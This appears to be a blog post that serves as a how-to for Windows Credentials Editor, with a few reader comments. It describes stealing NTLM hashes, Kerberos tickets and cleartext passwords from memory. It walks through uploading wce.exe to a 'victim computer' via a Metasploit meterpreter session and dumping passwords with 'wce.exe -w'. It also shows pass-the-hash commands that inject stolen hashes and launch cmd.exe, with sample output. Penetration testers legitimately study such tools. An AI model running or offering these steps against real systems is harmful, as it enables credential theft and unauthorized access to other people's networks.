Windows
Credentials Editor (WCE) is a security tool that allows to list
Windows logon sessions and add, change, list and delete associated
credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext
passwords).
The tool allows users to:
The tool allows users to:
- Perform Pass-the-Hash on Windows
- 'Steal' NTLM credentials from memory (with and without code injection)
- 'Steal' Kerberos Tickets from Windows machines
- Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
- Dump cleartext passwords stored by Windows authentication packages
WCE
is a security tool widely used by security professionals to assess
the security of Windows networks via Penetration Testing.
After
hack remote computer upload wce to victim computer using metasploit
(1)Type
following command in meterpreter session.
Upload
/pentest/passwords/wce/wce.exe .(2)Now type shell to get cmd of victim pc
(3)Type wce.exe -w to get password in clear text
List NTLM credentials in memory?
By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe
How to Change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!
How to Create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe
How to generate NTLM hashes with WCE?
wce.exe -g <cleartext password>For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7
If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2
If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.
2 comments:
amazing but i want 2 know more!!!
Thank you, you can download pdf file which are listed at end of article@Sanju kutty
Post a Comment